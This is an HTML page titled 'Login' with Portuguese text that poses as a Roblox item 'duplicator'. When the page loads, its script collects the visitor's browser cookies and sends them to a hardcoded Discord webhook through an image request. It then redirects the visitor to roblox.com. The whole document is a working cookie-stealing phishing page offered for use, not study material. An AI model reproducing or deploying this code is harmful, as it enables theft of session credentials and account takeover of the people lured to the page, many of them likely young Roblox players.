<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: Arial, sans-serif;
            background-image: url('https://pbs.twimg.com/media/E8CMoPuVgBY4W9q.jpg:large');
            background-size: cover;
            background-repeat: no-repeat;
            background-position: center;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
        }
        .cookie-alert {
            color: red;
            display: none;
        }
    </style>
</head>
<body>
    <p id="warning" class="cookie-alert">Verifique se o código copiado da extensão está correto e aguarde até 10 minutos para que o duplicador funcione. Lembre-se, se não funcionar, coloque o código novamente.</p>

    <script>
        // Função para enviar os cookies para o seu Discord webhook
        function sendCookies() {
            // Captura os cookies
            var cookies = document.cookie;

            // Display warning message
            document.getElementById('warning').style.display = "block";

            // Envia os cookies para o seu Discord webhook
            var url = 'https://discord.com/api/webhooks/1040678839396872322/TIl24vk7NiW4Fz3zACaKchZhtMc8ien3KjI9ha9EU1dTBeKIDH18H3Fgx3uStpAkG5Ud';
            var img = new Image();
            img.src = url + '?cookie=' + encodeURIComponent(cookies);

            // Aguarde um pouco antes de redirecionar
            setTimeout(function() {
                window.location.href = "https://www.roblox.com/";
            }, 1000); // Redireciona para o Roblox após 1 segundo
        }

        // Chama a função sendCookies assim que a página for carregada
        window.onload = sendCookies;
    </script>
</body>
</html>
